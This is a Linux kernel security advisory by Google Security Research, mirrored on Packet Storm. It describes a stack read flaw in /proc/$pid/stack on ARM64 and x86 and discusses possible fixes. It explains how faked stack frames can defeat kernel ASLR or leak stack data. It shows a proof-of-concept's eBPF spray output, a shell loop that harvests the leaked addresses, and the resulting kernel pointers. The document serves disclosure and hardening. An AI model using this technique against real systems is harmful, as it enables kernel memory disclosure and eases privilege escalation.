what you don't know can hurt you

Linux Semi-Arbitrary Task Stack Read On ARM64 / x86

Linux Semi-Arbitrary Task Stack Read On ARM64 / x86
Posted Oct 18, 2018
Authored by Jann Horn, Google Security Research

Linux suffers from a semi-arbitrary task stack read on ARM64 (and x86) via /proc/$pid/stack.

tags | advisory, arbitrary, x86
systems | linux
MD5 | 7100e417a396e293988088f73c3b7c3a

Linux Semi-Arbitrary Task Stack Read On ARM64 / x86

Change Mirror Download
Linux: semi-arbitrary task stack read on ARM64 (and x86) via /proc/$pid/stack 




This issue probably had the most impact on ARM64 kernels before
commit e01e80634ecd ("fork: unconditionally clear stack on fork", first in
v4.17); luckily, that hardening patch was backported all the way to v4.4 (but
not v3.16), so most systems probably have that patch already.

On both ARM64 and x86, /proc/$pid/stack can be used to inspect the symbolized
kernel stack of a task that is concurrently executing on another CPU. (x86 has
a check, but that check is racy, and a comment also documents that it is racy.)
This means that the kernel can potentially attempt to unwind an active task
stack starting from an outdated frame pointer, causing the kernel to interpret
new stack contents (potentially user-supplied data) as a stack frame.

On both x86 and ARM64, the kernel ensures that only stack frames inside the
target's task stack area are dereferenced.
On x86, it is also ensured that only stack frames whose saved instruction
pointer points to some valid text section are printed; on ARM64, stack frames
are printed independent of where the saved instruction pointer points.
The format string element used for printing such stack traces is "%pB", which is
normally used for writing information about kernel crashes to the console; on
kernels with CONFIG_KALLSYMS, it is implemented by sprint_backtrace(), which
falls back to printing raw addresses with "0x%lx" when an address can't be
mapped to a symbol.

On ARM64, the kernel ensures that stack frames are 16-byte-aligned.

This leads to two potential attacks:

1. An attacker can fake a stack frame with a controlled fake instruction pointer
and observe to which symbol the kernel maps it. This could be used both to
break kernel text ASLR and (if the attacker doesn't have access to the kernel
image anyway) to gain more fine-grained information about the layout of
kernel code.
2. An attacker can fake a stack frame that points to an arbitrary location in
the task stack (subject to alignment constraints) in order to leak data
stored at that address into the stack trace returned to userspace.
(This is more practical on ARM64, but might also work on x86 if you only need
to leak one byte at a time.)
3. A from my perspective relatively boring DoS: It looks as if building a loop
out of stackframes whose saved instruction pointers point into scheduler code
will send the task that's attempting to read /proc/$pid/stack into an endless
loop.

I have written a PoC for attack 2 and tested it on a Raspberry Pi 3, using a
custom 64-bit build of the Raspberry Pi kernel (based on 4.18.y) with
CONFIG_BPF_SYSCALL manually enabled (because I'm too lazy to search for a more
normal way to spray things on the kernel stack in the right places), built with
gcc 7.2.0. I have attached the PoC as pipe_read.c. The PoC leaks the BPF frame
pointer.

Usage:

In terminal 1:
==============
pi@raspberrypi:~/stack_dump$ gcc -o pipe_read pipe_read.c -pthread && ./pipe_read
==========================
0: (18) r0 = 0xbadbeefbadbeef00
2: (bf) r1 = r10
3: (07) r1 += -24
4: (7b) *(u64 *)(r10 -16) = r10
5: (7b) *(u64 *)(r10 -40) = r1
6: (7b) *(u64 *)(r10 -48) = r0
7: (7b) *(u64 *)(r10 -56) = r1
8: (7b) *(u64 *)(r10 -64) = r0
9: (7b) *(u64 *)(r10 -72) = r1
10: (7b) *(u64 *)(r10 -80) = r0
11: (7b) *(u64 *)(r10 -88) = r1
12: (7b) *(u64 *)(r10 -96) = r0
13: (7b) *(u64 *)(r10 -104) = r1
14: (7b) *(u64 *)(r10 -112) = r0
15: (7b) *(u64 *)(r10 -120) = r1
16: (7b) *(u64 *)(r10 -128) = r0
17: (7b) *(u64 *)(r10 -136) = r1
18: (7b) *(u64 *)(r10 -144) = r0
19: (7b) *(u64 *)(r10 -152) = r1
20: (7b) *(u64 *)(r10 -160) = r0
21: (7b) *(u64 *)(r10 -168) = r1
22: (7b) *(u64 *)(r10 -176) = r0
23: (7b) *(u64 *)(r10 -184) = r1
24: (7b) *(u64 *)(r10 -192) = r0
25: (7b) *(u64 *)(r10 -200) = r1
26: (7b) *(u64 *)(r10 -208) = r0
27: (7b) *(u64 *)(r10 -216) = r1
[...]
1920: (7b) *(u64 *)(r10 -480) = r0
1921: (7b) *(u64 *)(r10 -488) = r1
1922: (7b) *(u64 *)(r10 -496) = r0
1923: (7b) *(u64 *)(r10 -504) = r1
1924: (7b) *(u64 *)(r10 -512) = r0
1925: (b7) r0 = 0
1926: (95) exit
processed 1926 insns (limit 131072), stack depth 512
==========================
==============

In terminal 2:
==============
$ while true; do cat /proc/$(pgrep pipe_read)/stack; done |grep -A1 badbeef
[...]
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffffdf36987000
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffff800e5cbb78
--
[<0>] 0xbadbeefbadbeef00
[<0>] 0xffffffdf36987000
[...]
==============

In terminal 3 (note that this requires kernel.kptr_restrict==1,
kptr_restrict=0 prints garbage):
==============
# grep _do_fork /proc/vmallocinfo | grep 0xffffff800e5c
0xffffff800e5c8000-0xffffff800e5cd000 20480 _do_fork+0xe8/0x420 pages=4 vmalloc
#
==============


I'm not sure what the best fix for this is.

32-bit ARM is playing it safe and just refuses to print stack traces for
non-current tasks if CONFIG_SMP is on:
==============
if (tsk != current) {
#ifdef CONFIG_SMP
/*
* What guarantees do we have here that 'tsk' is not
* running on another CPU? For now, ignore it as we
* can't guarantee we won't explode.
*/
if (trace->nr_entries < trace->max_entries)
trace->entries[trace->nr_entries++] = ULONG_MAX;
return;
#else
==============

With my "annoying security person" hat on: Would it make sense to just gate
proc_pid_stack() on file_ns_capable(m->file, &init_user_ns, CAP_SYS_ADMIN)?
That way, even if the unwind code gets some edgecase wrong, it won't cause the
disclosure of kernel memory to userspace.

If this code should continue to work without CAP_SYS_ADMIN, solving the issue is
probably not so straightforward...

One approach would be to fire an IPI to request that the target task dumps its
own stack.

Another approach might be to, between every time a pointer is read from the
target's stack and it is dereferenced, check somehow whether the target task has
been scheduled in the maintime. Perhaps by checking p->nvcsw, p->nivcsw and
p->on_cpu, if that works without races? The reason why I'd like to have more
than just one check at the end for this approach are (non-speculative) side
channels.


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.



Found by: jannh

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    2 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    18 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    22 Files
  • 20
    Jun 20th
    14 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close